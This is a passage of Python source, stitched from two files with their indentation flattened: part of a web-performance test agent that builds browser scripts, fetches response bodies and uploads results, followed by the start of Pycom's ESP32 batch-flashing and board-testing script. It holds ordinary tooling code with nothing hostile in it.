except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
if job['warmup'] > 0:
job['warmup'] -= 1
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos + 1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', value) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, value])
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', addr) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, addr])
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and attr_value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
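    # Script format consumed by build_script() above: tab-separated
    # "command<TAB>target<TAB>value" lines, with the value optional. An
    # illustrative script (tabs shown as runs of spaces):
    #   setUserAgent      SomeAgent/1.0
    #   blockDomains      ads.example.com
    #   navigateAndWait   www.example.com
    # An "...AndWait" suffix is stripped from the command and marks the step
    # as a recorded (video-captured) step.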
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
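    # The margins.json file written above maps a browser name to the measured
    # window chrome, e.g. (illustrative values):
    #   {"Chrome": {"width": 10, "height": 85}}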
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if self.job['warmup'] > 0:
logging.debug('Discarding warmup run')
else:
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
if data[key] != None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file': (filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
flasher.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018, Pycom Limited.
#
# This software is licensed under the GNU GPL version 3 or any
# later version, with permitted additional terms. For more information
# see the Pycom Licence v1.0 document supplied with this file, or
# available at https://www.pycom.io/opensource/licensing
#
"""
Flash the ESP32 (bootloader, partitions table and factory app).
How to call esptool:
python esptool.py '--chip', 'esp32', '--port', /dev/ttyUSB0, '--baud', '921600', 'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', bootloader.bin, '0x8000', partitions.bin, '0x10000', application.bin, '0x3FF000', 'config_no_wifi.bin'
"""
from esptool import ESP32ROM
import os
import sys
import struct
import sqlite3
import argparse
import subprocess
import threading
import time
import fw_version
import csv
working_threads = {}
macs_db = None
wmacs = {}
DB_MAC_UNUSED = 0
DB_MAC_ERROR = -1
DB_MAC_LOCK = -2
DB_MAC_OK = 1
def open_macs_db(db_filename):
global macs_db
if not os.path.exists(db_filename):
print("MAC addresses database not found")
sys.exit(1)
macs_db = sqlite3.connect(db_filename)
def fetch_MACs(number):
return [x[0].encode('ascii', 'ignore') for x in macs_db.execute("select mac from macs where status = 0 order by rowid asc limit ?", (number,)).fetchall()]
def set_mac_status(mac, wmac, status):
macs_db.execute("update macs set status = ?, last_touch = strftime('%s','now'), wmac = ? where mac = ?", (status, wmac, mac))
macs_db.commit()
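# Sketch of a helper for bench testing (assumption: not part of the production
# flow): creates an empty "macs" table with the columns referenced by
# fetch_MACs() and set_mac_status() above. The column types are assumptions;
# only the column names come from those queries.
def create_empty_macs_db(db_filename):
    db = sqlite3.connect(db_filename)
    db.execute("create table if not exists macs "
               "(mac text primary key, status integer default 0, "
               "last_touch integer, wmac text)")
    db.commit()
    db.close()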
def print_exception(e):
print ('Exception: {}, on line {}'.format(e, sys.exc_info()[-1].tb_lineno))
def erase_flash(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_erases = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'Chip erase completed successfully' in nextline:
sys.stdout.write('Board erased OK on port %s\n' % port)
num_erases += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_erases != 1:
working_threads[port] = None
def read_wlan_mac(port, command):
global working_threads
global wmacs
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
mac_read = False
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'MAC: ' in nextline:
wmacs[port] = nextline[5:-1].replace(":", "-").upper()
sys.stdout.write('MAC address %s read OK on port %s\n' % (nextline[5:-1], port))
mac_read = True
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or not mac_read:
working_threads[port] = None
def set_vdd_sdio_voltage(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'VDD_SDIO setting complete' in nextline:
sys.stdout.write('Board VDD_SDIO Voltage configured OK on port %s\n' % port)
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0:
working_threads[port] = None
def flash_firmware(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_hashes = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'at 0x00001000' in nextline:
sys.stdout.write('Bootloader programmed OK on port %s\n' % port)
elif 'at 0x00008000' in nextline:
sys.stdout.write('Partition table programmed OK on port %s\n' % port)
elif 'at 0x00010000' in nextline:
sys.stdout.write('Application programmed OK on port %s\n' % port)
elif 'Hash of data verified' in nextline:
num_hashes += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_hashes != 3:
working_threads[port] = None
def run_initial_test(port, board):
global working_threads
if board == 'LoPy':
import run_initial_lopy_test as run_test
elif board == 'LoPy4':
import run_initial_lopy4_test as run_test
elif board == 'SiPy':
import run_initial_sipy_test as run_test
else:
import run_initial_wipy_test as run_test
try:
if not run_test.test_board(port):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def flash_lpwan_mac(port, mac):
import flash_lpwan_mac
global working_threads
try:
if not flash_lpwan_mac.program_board(port, mac):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_final_test(port, board, mac):
if board == 'LoPy':
import run_final_lopy_test as run_test
elif board == 'LoPy4':
import run_final_lopy4_test as run_test
else:
import run_final_sipy_test as run_test
try:
if not run_test.test_board(port, mac, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_qa_test(port, board):
global working_threads
if board == 'LoPy':
import run_qa_lopy_test as run_test
elif board == 'LoPy4':
import run_qa_lopy4_test as run_test
elif board == 'SiPy':
import run_qa_sipy_test as run_test
else:
import run_qa_wipy_test as run_test
try:
if not run_test.test_board(port, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def main():
cmd_parser = argparse.ArgumentParser(description='Flash the ESP32 and optionally run a small test on it.')
cmd_parser.add_argument('--esptool', default=None, help='the path to the esptool')
cmd_parser.add_argument('--espefuse', default=None, help='the path to the espefuse')
cmd_parser.add_argument('--boot', default=None, help='the path to the bootloader binary')
cmd_parser.add_argument('--table', default=None, help='the path to the partitions table')
cmd_parser.add_argument('--app', default=None, help='the path to the application binary')
cmd_parser.add_argument('--macs', default="macs.db", help='the path to the MAC addresses database')
cmd_parser.add_argument('--ports', default=['/dev/ttyUSB0'], nargs='+', help="the serial ports of the ESP32's to program")
cmd_parser.add_argument('--erase', default=None, help='set to True to erase the boards first')
    cmd_parser.add_argument('--qa', action='store_true', help='just do some quality assurance tests')
cmd_parser.add_argument('--board', default='LoPy', help='identifies the board to be flashed and tested')
cmd_parser.add_argument('--revision', default='1', help='identifies the hardware revision')
cmd_args = cmd_parser.parse_args()
global working_threads
global wmacs
output = ""
ret = 0
global_ret = 0
if cmd_args.qa:
raw_input("Please reset all the boards, wait until the LED starts blinking and then press enter...")
time.sleep(2.5) # wait for the board to reset
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_qa_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
print("Failed QA test on board connected to %s" % port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("QA test succeeded on all boards:-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the QA test!")
print("=============================================================")
global_ret = 1
else:
print("Reading the WLAN MAC address...")
try:
for port in cmd_args.ports:
cmd = ['python', 'esptool.py', '--port', port, 'read_mac']
working_threads[port] = threading.Thread(target=read_wlan_mac, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error reading the WLAN MAC on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("WLAN MAC address reading succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: WLAN MAC address reading failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
if int(cmd_args.revision) > 1:
# program the efuse bits to set the VDD_SDIO voltage to 1.8V
try:
print('Configuring the VDD_SDIO voltage...')
for port in cmd_args.ports:
cmd = ['python', cmd_args.espefuse, '--port', port, '--do-not-confirm', 'set_flash_voltage', '1.8V']
working_threads[port] = threading.Thread(target=set_vdd_sdio_voltage, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error setting the VDD_SDIO voltage on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("VDD_SDIO voltage setting succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: VDD_SDIO voltage setting failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
if cmd_args.erase:
try:
print('Erasing flash memory... (will take a few seconds)')
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'erase_flash']
working_threads[port] = threading.Thread(target=erase_flash, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error erasing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch erasing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch erasing failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
try:
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
open_macs_db(cmd_args.macs)
macs_list = fetch_MACs(len(cmd_args.ports))
if len(macs_list) < len(cmd_args.ports):
print("No enough remaining MAC addresses to use")
sys.exit(1)
mac_per_port = {}
i = 0
for port in cmd_args.ports:
mac_per_port[port] = macs_list[i]
i += 1
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', cmd_args.boot,
'0x8000', cmd_args.table, '0x10000', cmd_args.app]
working_threads[port] = threading.Thread(target=flash_firmware, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programming board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
else:
print("Board on port %s programmed OK" % port)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch firmware programming failed on some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please place all boards into run mode, RESET them and then \n press enter to continue with the testing process...")
time.sleep(5.0) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_initial_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
